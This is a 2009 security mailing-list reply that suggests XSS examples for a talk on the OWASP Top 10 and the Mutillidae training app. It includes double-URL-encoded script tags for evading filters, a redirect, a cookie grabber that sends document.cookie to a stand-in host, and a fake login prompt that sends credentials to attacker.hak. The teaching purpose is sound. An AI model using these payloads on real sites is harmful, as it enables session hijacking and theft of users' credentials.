Adrian,
On May 28, 2009, at 2:50 PM, Adrian Crenshaw wrote:
Ok, I've got yet another presentation coming up, this time on the
OWASP Top 10 and Mutillidae. One of the things I'm going to cover is
XSS. The canonical example of course is:
<script>alert("XSS");</script>
but that is boring, and gives folks the impression that XSS is not
that serious. Better short eample swoul be:
One of the more interesting challenges with web applications is the
fact that the browser supports multi encoding types and double
encoding entries.
Here is a SIMPLE double encode of your alert:
<script>alert('WEEEE');</script>
Hex encode the < and / tags:
%3Cscript%3Ealert('WEEEE');%3C%2Fscript%3E
Maybe you can avoid simple filtering of a single encode filtering by
encoding the % in the '%3C':
%253Cscript%253Ealert('WEEE');%253%252Fscript%253E
We can go further and continue to obfuscate things and bypass more and
more filters.
Redirect traffic to your site:
<script>window.location = "http://www.irongeek.com/";</script>
A little cookie Grabbing:
<script>
new Image().src="http://some-ip/mutillidae/catch.php?
cookie="+encodeURI(document.cookie);
</script>
In addition its also worthwhile to note that you do not even need to
have a real running webserver on this particular http://some-ip/
mutillidae/
The important thing to note is what the browser is understanding here.
http://some-ip/catch.php? <- this script doesn't technically need to
exist.
cookie='+ <--- this is the part that is telling the browser hey in the
actual URL stream append something beyond the cookie= field.
+encodeURI(document.cookie); <- HEY in the URI field insert your
current cookie from this current site and send it in the raw URL.
If you have a backdoor listening shell then you will get the cookie in
a URI encoded format showing up in your listener as a RAW http request.
Or maybe a password form to make people think they have to login,
but it just grabs the credentials:
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://attacker.hak/catch.php?
username="+username+"&password="+password+"\">");
</script>
What are other cool thing to inject, besides maybe BeEF, that shows
of how XSS can be a big deal?
Other uses include a distributed port scanner within javascript
leveraging the browser and sending in a port scan and scanning the
network that she is on.
Thanks,
Adrian
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
